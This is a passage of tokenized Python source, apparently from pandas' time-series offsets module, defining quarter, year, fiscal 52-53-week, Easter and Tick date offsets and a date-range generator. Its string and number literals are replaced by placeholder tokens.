kwargs = { } <EOL> if suffix : <EOL> kwargs [ '<STR_LIT>' ] = _month_to_int [ suffix ] <EOL> else : <EOL> if cls . _from_name_startingMonth is not None : <EOL> kwargs [ '<STR_LIT>' ] = cls . _from_name_startingMonth <EOL> return cls ( ** kwargs ) <EOL> @ property <EOL> def rule_code ( self ) : <EOL> return '<STR_LIT>' % ( self . _prefix , _int_to_month [ self . startingMonth ] ) <EOL> class BQuarterEnd ( QuarterOffset ) : <EOL> """<STR_LIT>""" <EOL> _outputName = '<STR_LIT>' <EOL> _default_startingMonth = <NUM_LIT:3> <EOL> _from_name_startingMonth = <NUM_LIT:12> <EOL> _prefix = '<STR_LIT>' <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> base = other <EOL> other = datetime ( other . year , other . month , other . day , <EOL> other . hour , other . minute , other . second , <EOL> other . microsecond ) <EOL> wkday , days_in_month = tslib . monthrange ( other . year , other . month ) <EOL> lastBDay = days_in_month - max ( ( ( wkday + days_in_month - <NUM_LIT:1> ) <EOL> % <NUM_LIT:7> ) - <NUM_LIT:4> , <NUM_LIT:0> ) <EOL> monthsToGo = <NUM_LIT:3> - ( ( other . month - self . startingMonth ) % <NUM_LIT:3> ) <EOL> if monthsToGo == <NUM_LIT:3> : <EOL> monthsToGo = <NUM_LIT:0> <EOL> if n > <NUM_LIT:0> and not ( other . day >= lastBDay and monthsToGo == <NUM_LIT:0> ) : <EOL> n = n - <NUM_LIT:1> <EOL> elif n <= <NUM_LIT:0> and other . day > lastBDay and monthsToGo == <NUM_LIT:0> : <EOL> n = n + <NUM_LIT:1> <EOL> other = other + relativedelta ( months = monthsToGo + <NUM_LIT:3> * n , day = <NUM_LIT> ) <EOL> other = tslib . _localize_pydatetime ( other , base . tzinfo ) <EOL> if other . weekday ( ) > <NUM_LIT:4> : <EOL> other = other - BDay ( ) <EOL> return other <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> modMonth = ( dt . month - self . startingMonth ) % <NUM_LIT:3> <EOL> return BMonthEnd ( ) . onOffset ( dt ) and modMonth == <NUM_LIT:0> <EOL> _int_to_month = tslib . _MONTH_ALIASES <EOL> _month_to_int = dict ( ( v , k ) for k , v in _int_to_month . items ( ) ) <EOL> class BQuarterBegin ( QuarterOffset ) : <EOL> _outputName = "<STR_LIT>" <EOL> _default_startingMonth = <NUM_LIT:3> <EOL> _from_name_startingMonth = <NUM_LIT:1> <EOL> _prefix = '<STR_LIT>' <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> wkday , _ = tslib . monthrange ( other . year , other . month ) <EOL> first = _get_firstbday ( wkday ) <EOL> monthsSince = ( other . month - self . startingMonth ) % <NUM_LIT:3> <EOL> if n <= <NUM_LIT:0> and monthsSince != <NUM_LIT:0> : <EOL> monthsSince = monthsSince - <NUM_LIT:3> <EOL> if n <= <NUM_LIT:0> and ( monthsSince == <NUM_LIT:0> and other . day > first ) : <EOL> n = n + <NUM_LIT:1> <EOL> elif n > <NUM_LIT:0> and ( monthsSince == <NUM_LIT:0> and other . day < first ) : <EOL> n = n - <NUM_LIT:1> <EOL> other = other + relativedelta ( months = <NUM_LIT:3> * n - monthsSince ) <EOL> wkday , _ = tslib . monthrange ( other . year , other . month ) <EOL> first = _get_firstbday ( wkday ) <EOL> result = datetime ( other . year , other . month , first , <EOL> other . hour , other . minute , other . second , <EOL> other . microsecond ) <EOL> return result <EOL> class QuarterEnd ( QuarterOffset ) : <EOL> """<STR_LIT>""" <EOL> _outputName = '<STR_LIT>' <EOL> _default_startingMonth = <NUM_LIT:3> <EOL> _prefix = '<STR_LIT>' <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , ** kwds ) : <EOL> self . n = n <EOL> self . normalize = normalize <EOL> self . startingMonth = kwds . get ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> self . kwds = kwds <EOL> def isAnchored ( self ) : <EOL> return ( self . n == <NUM_LIT:1> and self . startingMonth is not None ) <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> other = datetime ( other . year , other . month , other . day , <EOL> other . hour , other . minute , other . second , <EOL> other . microsecond ) <EOL> wkday , days_in_month = tslib . monthrange ( other . year , other . month ) <EOL> monthsToGo = <NUM_LIT:3> - ( ( other . month - self . startingMonth ) % <NUM_LIT:3> ) <EOL> if monthsToGo == <NUM_LIT:3> : <EOL> monthsToGo = <NUM_LIT:0> <EOL> if n > <NUM_LIT:0> and not ( other . day >= days_in_month and monthsToGo == <NUM_LIT:0> ) : <EOL> n = n - <NUM_LIT:1> <EOL> other = other + relativedelta ( months = monthsToGo + <NUM_LIT:3> * n , day = <NUM_LIT> ) <EOL> return other <EOL> @ apply_index_wraps <EOL> def apply_index ( self , i ) : <EOL> return self . _end_apply_index ( i , self . freqstr ) <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> modMonth = ( dt . month - self . startingMonth ) % <NUM_LIT:3> <EOL> return MonthEnd ( ) . onOffset ( dt ) and modMonth == <NUM_LIT:0> <EOL> class QuarterBegin ( QuarterOffset ) : <EOL> _outputName = '<STR_LIT>' <EOL> _default_startingMonth = <NUM_LIT:3> <EOL> _from_name_startingMonth = <NUM_LIT:1> <EOL> _prefix = '<STR_LIT>' <EOL> def isAnchored ( self ) : <EOL> return ( self . n == <NUM_LIT:1> and self . startingMonth is not None ) <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> wkday , days_in_month = tslib . monthrange ( other . year , other . month ) <EOL> monthsSince = ( other . month - self . startingMonth ) % <NUM_LIT:3> <EOL> if n <= <NUM_LIT:0> and monthsSince != <NUM_LIT:0> : <EOL> monthsSince = monthsSince - <NUM_LIT:3> <EOL> if n <= <NUM_LIT:0> and ( monthsSince == <NUM_LIT:0> and other . day > <NUM_LIT:1> ) : <EOL> n = n + <NUM_LIT:1> <EOL> other = other + relativedelta ( months = <NUM_LIT:3> * n - monthsSince , day = <NUM_LIT:1> ) <EOL> return other <EOL> @ apply_index_wraps <EOL> def apply_index ( self , i ) : <EOL> freq_month = <NUM_LIT:12> if self . startingMonth == <NUM_LIT:1> else self . startingMonth - <NUM_LIT:1> <EOL> freqstr = '<STR_LIT>' % ( _int_to_month [ freq_month ] , ) <EOL> return self . _beg_apply_index ( i , freqstr ) <EOL> class YearOffset ( DateOffset ) : <EOL> """<STR_LIT>""" <EOL> _adjust_dst = True <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , ** kwds ) : <EOL> self . month = kwds . get ( '<STR_LIT>' , self . _default_month ) <EOL> if self . month < <NUM_LIT:1> or self . month > <NUM_LIT:12> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> DateOffset . __init__ ( self , n = n , normalize = normalize , ** kwds ) <EOL> @ classmethod <EOL> def _from_name ( cls , suffix = None ) : <EOL> kwargs = { } <EOL> if suffix : <EOL> kwargs [ '<STR_LIT>' ] = _month_to_int [ suffix ] <EOL> return cls ( ** kwargs ) <EOL> @ property <EOL> def rule_code ( self ) : <EOL> return '<STR_LIT>' % ( self . _prefix , _int_to_month [ self . month ] ) <EOL> class BYearEnd ( YearOffset ) : <EOL> """<STR_LIT>""" <EOL> _outputName = '<STR_LIT>' <EOL> _default_month = <NUM_LIT:12> <EOL> _prefix = '<STR_LIT>' <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> wkday , days_in_month = tslib . monthrange ( other . year , self . month ) <EOL> lastBDay = ( days_in_month - <EOL> max ( ( ( wkday + days_in_month - <NUM_LIT:1> ) % <NUM_LIT:7> ) - <NUM_LIT:4> , <NUM_LIT:0> ) ) <EOL> years = n <EOL> if n > <NUM_LIT:0> : <EOL> if ( other . month < self . month or <EOL> ( other . month == self . month and other . day < lastBDay ) ) : <EOL> years -= <NUM_LIT:1> <EOL> elif n <= <NUM_LIT:0> : <EOL> if ( other . month > self . month or <EOL> ( other . month == self . month and other . day > lastBDay ) ) : <EOL> years += <NUM_LIT:1> <EOL> other = other + relativedelta ( years = years ) <EOL> _ , days_in_month = tslib . monthrange ( other . year , self . month ) <EOL> result = datetime ( other . year , self . month , days_in_month , <EOL> other . hour , other . minute , other . second , <EOL> other . microsecond ) <EOL> if result . weekday ( ) > <NUM_LIT:4> : <EOL> result = result - BDay ( ) <EOL> return result <EOL> class BYearBegin ( YearOffset ) : <EOL> """<STR_LIT>""" <EOL> _outputName = '<STR_LIT>' <EOL> _default_month = <NUM_LIT:1> <EOL> _prefix = '<STR_LIT>' <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> wkday , days_in_month = tslib . monthrange ( other . year , self . month ) <EOL> first = _get_firstbday ( wkday ) <EOL> years = n <EOL> if n > <NUM_LIT:0> : <EOL> if ( other . month < self . month or <EOL> ( other . month == self . month and other . day < first ) ) : <EOL> years -= <NUM_LIT:1> <EOL> elif n <= <NUM_LIT:0> : <EOL> if ( other . month > self . month or <EOL> ( other . month == self . month and other . day > first ) ) : <EOL> years += <NUM_LIT:1> <EOL> other = other + relativedelta ( years = years ) <EOL> wkday , days_in_month = tslib . monthrange ( other . year , self . month ) <EOL> first = _get_firstbday ( wkday ) <EOL> return datetime ( other . year , self . month , first , other . hour , <EOL> other . minute , other . second , other . microsecond ) <EOL> class YearEnd ( YearOffset ) : <EOL> """<STR_LIT>""" <EOL> _default_month = <NUM_LIT:12> <EOL> _prefix = '<STR_LIT:A>' <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> def _increment ( date ) : <EOL> if date . month == self . month : <EOL> _ , days_in_month = tslib . monthrange ( date . year , self . month ) <EOL> if date . day != days_in_month : <EOL> year = date . year <EOL> else : <EOL> year = date . year + <NUM_LIT:1> <EOL> elif date . month < self . month : <EOL> year = date . year <EOL> else : <EOL> year = date . year + <NUM_LIT:1> <EOL> _ , days_in_month = tslib . monthrange ( year , self . month ) <EOL> return datetime ( year , self . month , days_in_month , <EOL> date . hour , date . minute , date . second , <EOL> date . microsecond ) <EOL> def _decrement ( date ) : <EOL> year = date . year if date . month > self . month else date . year - <NUM_LIT:1> <EOL> _ , days_in_month = tslib . monthrange ( year , self . month ) <EOL> return datetime ( year , self . month , days_in_month , <EOL> date . hour , date . minute , date . second , <EOL> date . microsecond ) <EOL> def _rollf ( date ) : <EOL> if date . month != self . month or date . day < tslib . monthrange ( date . year , date . month ) [ <NUM_LIT:1> ] : <EOL> date = _increment ( date ) <EOL> return date <EOL> n = self . n <EOL> result = other <EOL> if n > <NUM_LIT:0> : <EOL> while n > <NUM_LIT:0> : <EOL> result = _increment ( result ) <EOL> n -= <NUM_LIT:1> <EOL> elif n < <NUM_LIT:0> : <EOL> while n < <NUM_LIT:0> : <EOL> result = _decrement ( result ) <EOL> n += <NUM_LIT:1> <EOL> else : <EOL> result = _rollf ( result ) <EOL> return result <EOL> @ apply_index_wraps <EOL> def apply_index ( self , i ) : <EOL> return self . _end_apply_index ( i , self . freqstr ) <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> wkday , days_in_month = tslib . monthrange ( dt . year , self . month ) <EOL> return self . month == dt . month and dt . day == days_in_month <EOL> class YearBegin ( YearOffset ) : <EOL> """<STR_LIT>""" <EOL> _default_month = <NUM_LIT:1> <EOL> _prefix = '<STR_LIT>' <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> def _increment ( date , n ) : <EOL> year = date . year + n - <NUM_LIT:1> <EOL> if date . month >= self . month : <EOL> year += <NUM_LIT:1> <EOL> return datetime ( year , self . month , <NUM_LIT:1> , date . hour , date . minute , <EOL> date . second , date . microsecond ) <EOL> def _decrement ( date , n ) : <EOL> year = date . year + n + <NUM_LIT:1> <EOL> if date . month < self . month or ( date . month == self . month and <EOL> date . day == <NUM_LIT:1> ) : <EOL> year -= <NUM_LIT:1> <EOL> return datetime ( year , self . month , <NUM_LIT:1> , date . hour , date . minute , <EOL> date . second , date . microsecond ) <EOL> def _rollf ( date ) : <EOL> if ( date . month != self . month ) or date . day > <NUM_LIT:1> : <EOL> date = _increment ( date , <NUM_LIT:1> ) <EOL> return date <EOL> n = self . n <EOL> result = other <EOL> if n > <NUM_LIT:0> : <EOL> result = _increment ( result , n ) <EOL> elif n < <NUM_LIT:0> : <EOL> result = _decrement ( result , n ) <EOL> else : <EOL> result = _rollf ( result ) <EOL> return result <EOL> @ apply_index_wraps <EOL> def apply_index ( self , i ) : <EOL> freq_month = <NUM_LIT:12> if self . month == <NUM_LIT:1> else self . month - <NUM_LIT:1> <EOL> freqstr = '<STR_LIT>' % ( _int_to_month [ freq_month ] , ) <EOL> return self . _beg_apply_index ( i , freqstr ) <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> return dt . month == self . month and dt . day == <NUM_LIT:1> <EOL> class FY5253 ( DateOffset ) : <EOL> """<STR_LIT>""" <EOL> _prefix = '<STR_LIT>' <EOL> _suffix_prefix_last = '<STR_LIT:L>' <EOL> _suffix_prefix_nearest = '<STR_LIT:N>' <EOL> _adjust_dst = True <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , ** kwds ) : <EOL> self . n = n <EOL> self . normalize = normalize <EOL> self . startingMonth = kwds [ '<STR_LIT>' ] <EOL> self . weekday = kwds [ "<STR_LIT>" ] <EOL> self . variation = kwds [ "<STR_LIT>" ] <EOL> self . kwds = kwds <EOL> if self . n == <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if self . variation not in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> raise ValueError ( '<STR_LIT>' % self . variation ) <EOL> if self . variation == "<STR_LIT>" : <EOL> weekday_offset = weekday ( self . weekday ) <EOL> self . _rd_forward = relativedelta ( weekday = weekday_offset ) <EOL> self . _rd_backward = relativedelta ( weekday = weekday_offset ( - <NUM_LIT:1> ) ) <EOL> else : <EOL> self . _offset_lwom = LastWeekOfMonth ( n = <NUM_LIT:1> , weekday = self . weekday ) <EOL> def isAnchored ( self ) : <EOL> return self . n == <NUM_LIT:1> and self . startingMonth is not None and self . weekday is not None <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> dt = datetime ( dt . year , dt . month , dt . day ) <EOL> year_end = self . get_year_end ( dt ) <EOL> if self . variation == "<STR_LIT>" : <EOL> return year_end == dt or self . get_year_end ( dt - relativedelta ( months = <NUM_LIT:1> ) ) == dt <EOL> else : <EOL> return year_end == dt <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> prev_year = self . get_year_end ( <EOL> datetime ( other . year - <NUM_LIT:1> , self . startingMonth , <NUM_LIT:1> ) ) <EOL> cur_year = self . get_year_end ( <EOL> datetime ( other . year , self . startingMonth , <NUM_LIT:1> ) ) <EOL> next_year = self . get_year_end ( <EOL> datetime ( other . year + <NUM_LIT:1> , self . startingMonth , <NUM_LIT:1> ) ) <EOL> prev_year = tslib . _localize_pydatetime ( prev_year , other . tzinfo ) <EOL> cur_year = tslib . _localize_pydatetime ( cur_year , other . tzinfo ) <EOL> next_year = tslib . _localize_pydatetime ( next_year , other . tzinfo ) <EOL> if n > <NUM_LIT:0> : <EOL> if other == prev_year : <EOL> year = other . year - <NUM_LIT:1> <EOL> elif other == cur_year : <EOL> year = other . year <EOL> elif other == next_year : <EOL> year = other . year + <NUM_LIT:1> <EOL> elif other < prev_year : <EOL> year = other . year - <NUM_LIT:1> <EOL> n -= <NUM_LIT:1> <EOL> elif other < cur_year : <EOL> year = other . year <EOL> n -= <NUM_LIT:1> <EOL> elif other < next_year : <EOL> year = other . year + <NUM_LIT:1> <EOL> n -= <NUM_LIT:1> <EOL> else : <EOL> assert False <EOL> result = self . get_year_end ( <EOL> datetime ( year + n , self . startingMonth , <NUM_LIT:1> ) ) <EOL> result = datetime ( result . year , result . month , result . day , <EOL> other . hour , other . minute , other . second , <EOL> other . microsecond ) <EOL> return result <EOL> else : <EOL> n = - n <EOL> if other == prev_year : <EOL> year = other . year - <NUM_LIT:1> <EOL> elif other == cur_year : <EOL> year = other . year <EOL> elif other == next_year : <EOL> year = other . year + <NUM_LIT:1> <EOL> elif other > next_year : <EOL> year = other . year + <NUM_LIT:1> <EOL> n -= <NUM_LIT:1> <EOL> elif other > cur_year : <EOL> year = other . year <EOL> n -= <NUM_LIT:1> <EOL> elif other > prev_year : <EOL> year = other . year - <NUM_LIT:1> <EOL> n -= <NUM_LIT:1> <EOL> else : <EOL> assert False <EOL> result = self . get_year_end ( <EOL> datetime ( year - n , self . startingMonth , <NUM_LIT:1> ) ) <EOL> result = datetime ( result . year , result . month , result . day , <EOL> other . hour , other . minute , other . second , <EOL> other . microsecond ) <EOL> return result <EOL> def get_year_end ( self , dt ) : <EOL> if self . variation == "<STR_LIT>" : <EOL> return self . _get_year_end_nearest ( dt ) <EOL> else : <EOL> return self . _get_year_end_last ( dt ) <EOL> def get_target_month_end ( self , dt ) : <EOL> target_month = datetime ( <EOL> dt . year , self . startingMonth , <NUM_LIT:1> , tzinfo = dt . tzinfo ) <EOL> next_month_first_of = target_month + relativedelta ( months = + <NUM_LIT:1> ) <EOL> return next_month_first_of + relativedelta ( days = - <NUM_LIT:1> ) <EOL> def _get_year_end_nearest ( self , dt ) : <EOL> target_date = self . get_target_month_end ( dt ) <EOL> if target_date . weekday ( ) == self . weekday : <EOL> return target_date <EOL> else : <EOL> forward = target_date + self . _rd_forward <EOL> backward = target_date + self . _rd_backward <EOL> if forward - target_date < target_date - backward : <EOL> return forward <EOL> else : <EOL> return backward <EOL> def _get_year_end_last ( self , dt ) : <EOL> current_year = datetime ( <EOL> dt . year , self . startingMonth , <NUM_LIT:1> , tzinfo = dt . tzinfo ) <EOL> return current_year + self . _offset_lwom <EOL> @ property <EOL> def rule_code ( self ) : <EOL> suffix = self . get_rule_code_suffix ( ) <EOL> return "<STR_LIT>" % ( self . _get_prefix ( ) , suffix ) <EOL> def _get_prefix ( self ) : <EOL> return self . _prefix <EOL> def _get_suffix_prefix ( self ) : <EOL> if self . variation == "<STR_LIT>" : <EOL> return self . _suffix_prefix_nearest <EOL> else : <EOL> return self . _suffix_prefix_last <EOL> def get_rule_code_suffix ( self ) : <EOL> return '<STR_LIT>' % ( self . _get_suffix_prefix ( ) , <EOL> _int_to_month [ self . startingMonth ] , <EOL> _int_to_weekday [ self . weekday ] ) <EOL> @ classmethod <EOL> def _parse_suffix ( cls , varion_code , startingMonth_code , weekday_code ) : <EOL> if varion_code == "<STR_LIT:N>" : <EOL> variation = "<STR_LIT>" <EOL> elif varion_code == "<STR_LIT:L>" : <EOL> variation = "<STR_LIT>" <EOL> else : <EOL> raise ValueError ( <EOL> "<STR_LIT>" % ( varion_code , ) ) <EOL> startingMonth = _month_to_int [ startingMonth_code ] <EOL> weekday = _weekday_to_int [ weekday_code ] <EOL> return { <EOL> "<STR_LIT>" : weekday , <EOL> "<STR_LIT>" : startingMonth , <EOL> "<STR_LIT>" : variation , <EOL> } <EOL> @ classmethod <EOL> def _from_name ( cls , * args ) : <EOL> return cls ( ** cls . _parse_suffix ( * args ) ) <EOL> class FY5253Quarter ( DateOffset ) : <EOL> """<STR_LIT>""" <EOL> _prefix = '<STR_LIT>' <EOL> _adjust_dst = True <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , ** kwds ) : <EOL> self . n = n <EOL> self . normalize = normalize <EOL> self . qtr_with_extra_week = kwds [ "<STR_LIT>" ] <EOL> self . kwds = kwds <EOL> if self . n == <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . _offset = FY5253 ( <EOL> startingMonth = kwds [ '<STR_LIT>' ] , <EOL> weekday = kwds [ "<STR_LIT>" ] , <EOL> variation = kwds [ "<STR_LIT>" ] ) <EOL> def isAnchored ( self ) : <EOL> return self . n == <NUM_LIT:1> and self . _offset . isAnchored ( ) <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> base = other <EOL> n = self . n <EOL> if n > <NUM_LIT:0> : <EOL> while n > <NUM_LIT:0> : <EOL> if not self . _offset . onOffset ( other ) : <EOL> qtr_lens = self . get_weeks ( other ) <EOL> start = other - self . _offset <EOL> else : <EOL> start = other <EOL> qtr_lens = self . get_weeks ( other + self . _offset ) <EOL> for weeks in qtr_lens : <EOL> start += relativedelta ( weeks = weeks ) <EOL> if start > other : <EOL> other = start <EOL> n -= <NUM_LIT:1> <EOL> break <EOL> else : <EOL> n = - n <EOL> while n > <NUM_LIT:0> : <EOL> if not self . _offset . onOffset ( other ) : <EOL> qtr_lens = self . get_weeks ( other ) <EOL> end = other + self . _offset <EOL> else : <EOL> end = other <EOL> qtr_lens = self . get_weeks ( other ) <EOL> for weeks in reversed ( qtr_lens ) : <EOL> end -= relativedelta ( weeks = weeks ) <EOL> if end < other : <EOL> other = end <EOL> n -= <NUM_LIT:1> <EOL> break <EOL> other = datetime ( other . year , other . month , other . day , <EOL> base . hour , base . minute , base . second , base . microsecond ) <EOL> return other <EOL> def get_weeks ( self , dt ) : <EOL> ret = [ <NUM_LIT> ] * <NUM_LIT:4> <EOL> year_has_extra_week = self . year_has_extra_week ( dt ) <EOL> if year_has_extra_week : <EOL> ret [ self . qtr_with_extra_week - <NUM_LIT:1> ] = <NUM_LIT> <EOL> return ret <EOL> def year_has_extra_week ( self , dt ) : <EOL> if self . _offset . onOffset ( dt ) : <EOL> prev_year_end = dt - self . _offset <EOL> next_year_end = dt <EOL> else : <EOL> next_year_end = dt + self . _offset <EOL> prev_year_end = dt - self . _offset <EOL> week_in_year = ( next_year_end - prev_year_end ) . days / <NUM_LIT:7> <EOL> return week_in_year == <NUM_LIT> <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> if self . _offset . onOffset ( dt ) : <EOL> return True <EOL> next_year_end = dt - self . _offset <EOL> qtr_lens = self . get_weeks ( dt ) <EOL> current = next_year_end <EOL> for qtr_len in qtr_lens [ <NUM_LIT:0> : <NUM_LIT:4> ] : <EOL> current += relativedelta ( weeks = qtr_len ) <EOL> if dt == current : <EOL> return True <EOL> return False <EOL> @ property <EOL> def rule_code ( self ) : <EOL> suffix = self . _offset . get_rule_code_suffix ( ) <EOL> return "<STR_LIT>" % ( self . _prefix , <EOL> "<STR_LIT>" % ( suffix , self . qtr_with_extra_week ) ) <EOL> @ classmethod <EOL> def _from_name ( cls , * args ) : <EOL> return cls ( ** dict ( FY5253 . _parse_suffix ( * args [ : - <NUM_LIT:1> ] ) , <EOL> qtr_with_extra_week = int ( args [ - <NUM_LIT:1> ] ) ) ) <EOL> class Easter ( DateOffset ) : <EOL> """<STR_LIT>""" <EOL> _adjust_dst = True <EOL> def __init__ ( self , n = <NUM_LIT:1> , ** kwds ) : <EOL> super ( Easter , self ) . __init__ ( n , ** kwds ) <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> currentEaster = easter ( other . year ) <EOL> currentEaster = datetime ( <EOL> currentEaster . year , currentEaster . month , currentEaster . day ) <EOL> currentEaster = tslib . _localize_pydatetime ( currentEaster , other . tzinfo ) <EOL> if self . n >= <NUM_LIT:0> : <EOL> if other >= currentEaster : <EOL> new = easter ( other . year + self . n ) <EOL> else : <EOL> new = easter ( other . year + self . n - <NUM_LIT:1> ) <EOL> else : <EOL> if other > currentEaster : <EOL> new = easter ( other . year + self . n + <NUM_LIT:1> ) <EOL> else : <EOL> new = easter ( other . year + self . n ) <EOL> new = datetime ( new . year , new . month , new . day , other . hour , <EOL> other . minute , other . second , other . microsecond ) <EOL> return new <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> return date ( dt . year , dt . month , dt . day ) == easter ( dt . year ) <EOL> def _tick_comp ( op ) : <EOL> def f ( self , other ) : <EOL> return op ( self . delta , other . delta ) <EOL> return f <EOL> class Tick ( SingleConstructorOffset ) : <EOL> _inc = Timedelta ( microseconds = <NUM_LIT:1000> ) <EOL> __gt__ = _tick_comp ( operator . gt ) <EOL> __ge__ = _tick_comp ( operator . ge ) <EOL> __lt__ = _tick_comp ( operator . lt ) <EOL> __le__ = _tick_comp ( operator . le ) <EOL> __eq__ = _tick_comp ( operator . eq ) <EOL> __ne__ = _tick_comp ( operator . ne ) <EOL> def __add__ ( self , other ) : <EOL> if isinstance ( other , Tick ) : <EOL> if type ( self ) == type ( other ) : <EOL> return type ( self ) ( self . n + other . n ) <EOL> else : <EOL> return _delta_to_tick ( self . delta + other . delta ) <EOL> try : <EOL> return self . apply ( other ) <EOL> except ApplyTypeError : <EOL> return NotImplemented <EOL> def __eq__ ( self , other ) : <EOL> if isinstance ( other , compat . string_types ) : <EOL> from pandas . tseries . frequencies import to_offset <EOL> other = to_offset ( other ) <EOL> if isinstance ( other , Tick ) : <EOL> return self . delta == other . delta <EOL> else : <EOL> return DateOffset . __eq__ ( self , other ) <EOL> def __hash__ ( self ) : <EOL> return hash ( self . _params ( ) ) <EOL> def __ne__ ( self , other ) : <EOL> if isinstance ( other , compat . string_types ) : <EOL> from pandas . tseries . frequencies import to_offset <EOL> other = to_offset ( other ) <EOL> if isinstance ( other , Tick ) : <EOL> return self . delta != other . delta <EOL> else : <EOL> return DateOffset . __ne__ ( self , other ) <EOL> @ property <EOL> def delta ( self ) : <EOL> return self . n * self . _inc <EOL> @ property <EOL> def nanos ( self ) : <EOL> return _delta_to_nanoseconds ( self . delta ) <EOL> def apply ( self , other ) : <EOL> if isinstance ( other , ( datetime , np . datetime64 , date ) ) : <EOL> return as_timestamp ( other ) + self <EOL> if isinstance ( other , timedelta ) : <EOL> return other + self . delta <EOL> elif isinstance ( other , type ( self ) ) : <EOL> return type ( self ) ( self . n + other . n ) <EOL> else : <EOL> raise ApplyTypeError ( '<STR_LIT>' % type ( other ) . __name__ ) <EOL> _prefix = '<STR_LIT>' <EOL> def isAnchored ( self ) : <EOL> return False <EOL> def _delta_to_tick ( delta ) : <EOL> if delta . microseconds == <NUM_LIT:0> : <EOL> if delta . seconds == <NUM_LIT:0> : <EOL> return Day ( delta . days ) <EOL> else : <EOL> seconds = delta . days * <NUM_LIT> + delta . seconds <EOL> if seconds % <NUM_LIT> == <NUM_LIT:0> : <EOL> return Hour ( seconds / <NUM_LIT> ) <EOL> elif seconds % <NUM_LIT> == <NUM_LIT:0> : <EOL> return Minute ( seconds / <NUM_LIT> ) <EOL> else : <EOL> return Second ( seconds ) <EOL> else : <EOL> nanos = _delta_to_nanoseconds ( delta ) <EOL> if nanos % <NUM_LIT> == <NUM_LIT:0> : <EOL> return Milli ( nanos // <NUM_LIT> ) <EOL> elif nanos % <NUM_LIT:1000> == <NUM_LIT:0> : <EOL> return Micro ( nanos // <NUM_LIT:1000> ) <EOL> else : <EOL> return Nano ( nanos ) <EOL> _delta_to_nanoseconds = tslib . _delta_to_nanoseconds <EOL> class Day ( Tick ) : <EOL> _inc = Timedelta ( days = <NUM_LIT:1> ) <EOL> _prefix = '<STR_LIT:D>' <EOL> class Hour ( Tick ) : <EOL> _inc = Timedelta ( hours = <NUM_LIT:1> ) <EOL> _prefix = '<STR_LIT:H>' <EOL> class Minute ( Tick ) : <EOL> _inc = Timedelta ( minutes = <NUM_LIT:1> ) <EOL> _prefix = '<STR_LIT:T>' <EOL> class Second ( Tick ) : <EOL> _inc = Timedelta ( seconds = <NUM_LIT:1> ) <EOL> _prefix = '<STR_LIT:S>' <EOL> class Milli ( Tick ) : <EOL> _inc = Timedelta ( milliseconds = <NUM_LIT:1> ) <EOL> _prefix = '<STR_LIT:L>' <EOL> class Micro ( Tick ) : <EOL> _inc = Timedelta ( microseconds = <NUM_LIT:1> ) <EOL> _prefix = '<STR_LIT>' <EOL> class Nano ( Tick ) : <EOL> _inc = Timedelta ( nanoseconds = <NUM_LIT:1> ) <EOL> _prefix = '<STR_LIT:N>' <EOL> BDay = BusinessDay <EOL> BMonthEnd = BusinessMonthEnd <EOL> BMonthBegin = BusinessMonthBegin <EOL> CBMonthEnd = CustomBusinessMonthEnd <EOL> CBMonthBegin = CustomBusinessMonthBegin <EOL> CDay = CustomBusinessDay <EOL> def _get_firstbday ( wkday ) : <EOL> """<STR_LIT>""" <EOL> first = <NUM_LIT:1> <EOL> if wkday == <NUM_LIT:5> : <EOL> first = <NUM_LIT:3> <EOL> elif wkday == <NUM_LIT:6> : <EOL> first = <NUM_LIT:2> <EOL> return first <EOL> def generate_range ( start = None , end = None , periods = None , <EOL> offset = BDay ( ) , time_rule = None ) : <EOL> """<STR_LIT>""" <EOL> if time_rule is not None : <EOL> from pandas . tseries . frequencies import get_offset <EOL> offset = get_offset ( time_rule ) <EOL> start = to_datetime ( start ) <EOL> end = to_datetime ( end ) <EOL> if start and not offset . onOffset ( start ) : <EOL> start = offset . rollforward ( start ) <EOL> elif end and not offset . onOffset ( end ) : <EOL> end = offset . rollback ( end ) <EOL> if periods is None and end < start : <EOL> end = None <EOL> periods = <NUM_LIT:0> <EOL> if end is None : <EOL> end = start + ( periods - <NUM_LIT:1> ) * offset <EOL> if start is None : <EOL> start = end - ( periods - <NUM_LIT:1> ) * offset <EOL> cur = start <EOL> if offset . n >= <NUM_LIT:0> : <EOL> while cur <= end : <EOL> yield cur <EOL> next_date = offset . apply ( cur ) <EOL> if next_date <= cur : <EOL> raise ValueError ( '<STR_LIT>' % offset ) <EOL> cur = next_date <EOL> else : <EOL> while cur >= end : <EOL> yield cur <EOL> next_date = offset . apply ( cur ) <EOL> if next_date >= cur : 